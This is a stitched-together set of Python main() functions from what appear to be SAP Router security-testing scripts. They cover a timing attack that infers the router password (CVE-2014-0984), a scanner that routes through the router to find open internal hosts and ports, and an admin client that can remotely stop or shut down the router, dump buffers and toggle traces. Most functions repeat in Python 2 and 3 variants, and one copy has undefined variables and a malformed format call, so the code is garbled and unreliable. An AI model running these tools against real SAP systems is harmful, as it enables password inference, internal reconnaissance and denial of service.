def main(): options = parse_options() if not has_fau_timer: print ("[-] Required library not found. Please install it from https://github.com/seecurity/mona-timing-lib") return if options.verbose: logging.basicConfig(level=logging.DEBUG) # Initiate the connection conn = SAPNIStreamSocket.get_nisocket(options.remote_host, options.remote_port) print("[*] Connected to the SAP Router %s:%d" % (options.remote_host, options.remote_port)) # Retrieve the router version used by the server if not specified if options.router_version is None: options.router_version = get_router_version(conn) print("[*] Using SAP Router version %d" % options.router_version) print("[*] Checking if the server is vulnerable to a timing attack (CVE-2014-0984) ...") with open(options.output, "w") as f: c = 0 for i in range(0, len(options.password) + 1): password = options.password[:i] + "X" * (len(options.password) - i) print("[*] Trying with password (%s) len %d" % (password, len(password))) for _ in range(0, options.tries): try_password(options, password, f, c) c += 1
def main(): options = parse_options() if options.verbose: logging.basicConfig(level=logging.DEBUG) print("[*] Connecting to SAP Router %s:%d (talk mode %s)" % (options.remote_host, options.remote_port, options.talk_mode)) # Retrieve the router version used by the server if not specified if options.router_version is None: conn = SAPNIStreamSocket.get_nisocket(options.remote_host, options.remote_port, keep_alive=False) options.router_version = get_router_version(conn) conn.close() print("[*] Using SAP Router version %d" % options.router_version) options.talk_mode = {"raw": 1, "ni": 0}[options.talk_mode] results = [] for (host, port) in parse_target_hosts(options.target_hosts, options.target_ports): status = route_test(options.remote_host, options.remote_port, host, port, options.talk_mode, options.router_version) if options.verbose: print("[*] Status of %s:%s: %s" % (host, port, status)) if status == "open": results.append((host, port)) print("[*] Host/Ports found open:") for (host, port) in results: print("\tHost: %s\tPort:%s" % (host, port))
def main(): options = parse_options() level = logging.INFO if options.verbose: level = logging.DEBUG logging.basicConfig(level=level,format = '%(messages)s') logging.info("[*]Connecting to SAP Router %s:%d (talk mode %s)"(options.remote_host,options.remote_port,options.talk_mode)) #Retrieve the router version used by the server if not specified if options.router_version is None: conn = SAPNIStreamSocket.get_nisocket(options.remote_host,options.remote_port,keep_alive=False) options.router_version = get_router_version(conn) conn.close() logging.info("[*] Using SAP Router Version %d" % options.router_version) options.talk_mode = {"raw":ROUTER_TALK_MODE_NI_RAW_IO , "ni":ROUTER_TALK_MODE_NI_MSG_IO}[options.talk_mode] results = [] for (host,port) in parse_target_hosts(options.target_hosts,options.target_ports): status = route_test(options.remote_host,options_port,host,port,options.talk_node,options.router_version) if options.verbose: logging.info("[*] status of %s:%s:%s" % (host,port,status)) if status == "open": results.append((host,port)) logging.info("[*] Host?ports found open:") for (host,port) in results: logging.info("\thost: %s\tport:%s" %(host,port))
def main(): options = parse_options() if options.verbose: logging.basicConfig(level=logging.DEBUG) # Initiate the connection conn = SAPNIStreamSocket.get_nisocket(options.remote_host, options.remote_port) print "[*] Connected to the SAP Router %s:%d" % (options.remote_host, options.remote_port) # Retrieve the router version used by the server if not specified if options.router_version is None: options.router_version = get_router_version(conn) print "[*] Using SAP Router version %d" % options.router_version print "[*] Checking if the server is vulnerable to a timing attack (CVE-2014-0984) ..." with open(options.output, "w") as f: c = 0 for i in range(0, len(options.password) + 1): password = options.password[:i] + "X" * (len(options.password) - i) print "[*] Trying with password (%s) len %d" % (password, len(password)) for _ in range(0, options.tries): try_password(options, password, f, c) c += 1
def main(): options = parse_options() if options.verbose: logging.basicConfig(level=logging.DEBUG) response = False p = SAPRouter(type=SAPRouter.SAPROUTER_ADMIN) if options.stop: p.adm_command = 5 print("[*] Requesting stop of the remote SAP Router") elif options.soft: p.adm_command = 9 print("[*] Requesting a soft shutdown of the remote SAP Router") response = True elif options.info: p.adm_command = 2 if options.info_password: if len(options.info_password) > 19: print("[*] Password too long, truncated at 19 characters") p.adm_password = options.info_password print("[*] Requesting info using password %s" % p.adm_password) else: print("[*] Requesting info") response = True elif options.new_route: p.adm_command = 3 print("[*] Requesting a refresh of the router table") elif options.trace: p.adm_command = 4 print("[*] Requesting a toggle on the trace settings") elif options.cancel: p.adm_command = 6 p.adm_client_ids = list(map(int, options.cancel.split(","))) print("[*] Requesting a cancel of the route(s) with client id(s) %s" % p.adm_client_ids) response = True elif options.dump: p.adm_command = 7 print("[*] Requesting a dump of the buffers") elif options.flush: p.adm_command = 8 print("[*] Requesting a flush of the buffers") elif options.hide: p.adm_command = 14 print("[*] Requesting a hide on the errors to clients") response = True elif options.set_peer: p.adm_command = 10 p.adm_address_mask = options.set_peer print("[*] Request a set peer trace for the address mask %s" % p.adm_address_mask) response = True elif options.clear_peer: p.adm_command = 11 p.adm_address_mask = options.clear_peer print("[*] Request a clear peer trace for the address mask %s" % p.adm_address_mask) response = True elif options.trace_conn: p.adm_command = 12 p.adm_client_ids = list(map(int, options.trace_conn.split(","))) print("[*] Requesting a connection trace with client id(s) %s" % p.adm_client_ids) response = True else: print("[*] No command specified !") return # Initiate the connection conn = SAPNIStreamSocket.get_nisocket(options.remote_host, options.remote_port) print("[*] Connected to the SAP Router %s:%d" % (options.remote_host, options.remote_port)) # Retrieve the router version used by the server if not specified if options.router_version: p.version = options.router_version else: p.version = get_router_version(conn) or p.version print("[*] Using SAP Router version %d" % p.version) # Send the router admin request print("[*] Sending Router Admin packet") if options.verbose: p.show2() conn.send(p) # Grab the response if required if response: # Some responses has no SAPRouter's packet format and are raw strings, # we need to get the SAP NI layer first and then check if we could go # down to the SAPRouter layer. raw_response = conn.recv()[SAPNI] if SAPRouter in raw_response: router_response = raw_response[SAPRouter] # If the response was null, just return elif raw_response.length == 0: return # If the response is an error, print and exit if router_is_error(router_response): print("[*] Error requesting info:") if options.verbose: router_response.show2() else: print(router_response.err_text_value.error) # Otherwise, print the packets sent by the SAP Router else: print("[*] Response:\n") if options.info: # Decode the first packet as a list of info client raw_response.decode_payload_as(SAPRouterInfoClients) clients = [] clients.append("\t".join( ["ID", "Client", "Partner", "Service", "Connected on"])) clients.append("-" * 60) for client in raw_response.clients: # If the trace flag is set, add a mark flag = "(*)" if client.flag_traced else "(+)" if client.flag_routed else "" fields = [ str(client.id), client.address, "%s%s" % (flag, client.partner) if client.flag_routed else "(no partner)", client.service if client.flag_routed else "", datetime.fromtimestamp(client.connected_on).ctime() ] clients.append("\t".join(fields)) # Decode the second packet as server info raw_response = conn.recv() raw_response.decode_payload_as(SAPRouterInfoServer) print( "SAP Network Interface Router running on port %d (PID = %d)\n" "Started on: %s\n" "Parent process: PID = %d, port = %d\n" % (raw_response.port, raw_response.pid, datetime.fromtimestamp(raw_response.started_on).ctime(), raw_response.ppid, raw_response.pport)) print("\n".join(clients)) print("(*) Connections being traced") # Show the plain packets returned try: raw_response = conn.recv() while raw_response: print(raw_response.payload) raw_response = conn.recv() except error: pass
def main(): options = parse_options() if options.verbose: logging.basicConfig(level=logging.DEBUG) response = False p = SAPRouter(type=SAPRouter.SAPROUTER_ADMIN) if options.stop: p.adm_command = 5 print("[*] Requesting stop of the remote SAP Router") elif options.soft: p.adm_command = 9 print("[*] Requesting a soft shutdown of the remote SAP Router") response = True elif options.info: p.adm_command = 2 if options.info_password: if len(options.info_password) > 19: print("[*] Password too long, truncated at 19 characters") p.adm_password = options.info_password print("[*] Requesting info using password %s" % p.adm_password) else: print("[*] Requesting info") response = True elif options.new_route: p.adm_command = 3 print("[*] Requesting a refresh of the router table") elif options.trace: p.adm_command = 4 print("[*] Requesting a toggle on the trace settings") elif options.cancel: p.adm_command = 6 p.adm_client_ids = list(map(int, options.cancel.split(","))) print("[*] Requesting a cancel of the route(s) with client id(s) %s" % p.adm_client_ids) response = True elif options.dump: p.adm_command = 7 print("[*] Requesting a dump of the buffers") elif options.flush: p.adm_command = 8 print("[*] Requesting a flush of the buffers") elif options.hide: p.adm_command = 14 print("[*] Requesting a hide on the errors to clients") response = True elif options.set_peer: p.adm_command = 10 p.adm_address_mask = options.set_peer print("[*] Request a set peer trace for the address mask %s" % p.adm_address_mask) response = True elif options.clear_peer: p.adm_command = 11 p.adm_address_mask = options.clear_peer print("[*] Request a clear peer trace for the address mask %s" % p.adm_address_mask) response = True elif options.trace_conn: p.adm_command = 12 p.adm_client_ids = list(map(int, options.trace_conn.split(","))) print("[*] Requesting a connection trace with client id(s) %s" % p.adm_client_ids) response = True else: print("[*] No command specified !") return # Initiate the connection conn = SAPNIStreamSocket.get_nisocket(options.remote_host, options.remote_port) print("[*] Connected to the SAP Router %s:%d" % (options.remote_host, options.remote_port)) # Retrieve the router version used by the server if not specified if options.router_version: p.version = options.router_version else: p.version = get_router_version(conn) or p.version print("[*] Using SAP Router version %d" % p.version) # Send the router admin request print("[*] Sending Router Admin packet") if options.verbose: p.show2() conn.send(p) # Grab the response if required if response: # Some responses has no SAPRouter's packet format and are raw strings, # we need to get the SAP NI layer first and then check if we could go # down to the SAPRouter layer. raw_response = conn.recv()[SAPNI] if SAPRouter in raw_response: router_response = raw_response[SAPRouter] # If the response was null, just return elif raw_response.length == 0: return # If the response is an error, print and exit if router_is_error(router_response): print("[*] Error requesting info:") if options.verbose: router_response.show2() else: print(router_response.err_text_value.error) # Otherwise, print the packets sent by the SAP Router else: print("[*] Response:\n") if options.info: # Decode the first packet as a list of info client raw_response.decode_payload_as(SAPRouterInfoClients) clients = [] clients.append("\t".join(["ID", "Client", "Partner", "Service", "Connected on"])) clients.append("-" * 60) for client in raw_response.clients: # If the trace flag is set, add a mark flag = "(*)" if client.flag_traced else "(+)" if client.flag_routed else "" fields = [str(client.id), client.address, "%s%s" % (flag, client.partner) if client.flag_routed else "(no partner)", client.service if client.flag_routed else "", datetime.fromtimestamp(client.connected_on).ctime()] clients.append("\t".join(fields)) # Decode the second packet as server info raw_response = conn.recv() raw_response.decode_payload_as(SAPRouterInfoServer) print("SAP Network Interface Router running on port %d (PID = %d)\n" "Started on: %s\n" "Parent process: PID = %d, port = %d\n" % (raw_response.port, raw_response.pid, datetime.fromtimestamp(raw_response.started_on).ctime(), raw_response.ppid, raw_response.pport)) print("\n".join(clients)) print("(*) Connections being traced") # Show the plain packets returned try: raw_response = conn.recv() while raw_response: print(raw_response.payload) raw_response = conn.recv() except error: pass
def main(): options = parse_options() if options.verbose: logging.basicConfig(level=logging.DEBUG) response = False p = SAPRouter(type=SAPRouter.SAPROUTER_ADMIN) if options.stop: p.adm_command = 5 print "[*] Requesting stop of the remote SAP Router" elif options.soft: p.adm_command = 9 print "[*] Requesting a soft shutdown of the remote SAP Router" response = True elif options.info: p.adm_command = 2 if options.info_password: if len(options.info_password) > 19: print "[*] Password too long, truncated at 19 characters" p.adm_password = options.info_password print "[*] Requesting info using password", p.adm_password else: print "[*] Requesting info" response = True elif options.new_route: p.adm_command = 3 print "[*] Requesting a refresh of the router table" elif options.trace: p.adm_command = 4 print "[*] Requesting a toggle on the trace settings" elif options.cancel: p.adm_command = 6 p.adm_client_ids = map(int, options.cancel.split(",")) print "[*] Requesting a cancel of the route(s) with client id(s) %s" % p.adm_client_ids response = True elif options.dump: p.adm_command = 7 print "[*] Requesting a dump of the buffers" elif options.flush: p.adm_command = 8 print "[*] Requesting a flush of the buffers" elif options.hide: p.adm_command = 14 print "[*] Requesting a hide on the errors to clients" response = True elif options.set_peer: p.adm_command = 10 p.adm_address_mask = options.set_peer print "[*] Request a set peer trace for the address mask %s" % p.adm_address_mask response = True elif options.clear_peer: p.adm_command = 11 p.adm_address_mask = options.clear_peer print "[*] Request a clear peer trace for the address mask %s" % p.adm_address_mask response = True elif options.trace_conn: p.adm_command = 12 p.adm_client_ids = map(int, options.trace_conn.split(",")) print "[*] Requesting a connection trace with client id(s) %s" % p.adm_client_ids response = True else: print "[*] No command specified !" return # Initiate the connection conn = SAPNIStreamSocket.get_nisocket(options.remote_host, options.remote_port) print "[*] Connected to the SAP Router %s:%d" % (options.remote_host, options.remote_port) # Retrieve the router version used by the server if not specified if options.router_version: p.version = options.router_version else: p.version = get_router_version(conn) or p.version print "[*] Using SAP Router version %d" % p.version # Send the router admin request print "[*] Sending Router Admin packet" if options.verbose: p.show2() conn.send(p) # Grab the response if required if response: # Some responses has no SAPRouter's packet format and are raw strings, # we need to get the SAP NI layer first and then check if we could go # down to the SAPRouter layer. response = conn.recv()[SAPNI] if SAPRouter in response and response[SAPRouter].payload: response = response[SAPRouter] # If the response is an error, print and exit if router_is_error(response): print "[*] Error requesting info:" if options.verbose: response.show2() else: print response.err_text_value # Otherwise, print all the packets sent by the SAP Router else: print "[*] Response:" try: while (response): print response.payload response = conn.recv() except: pass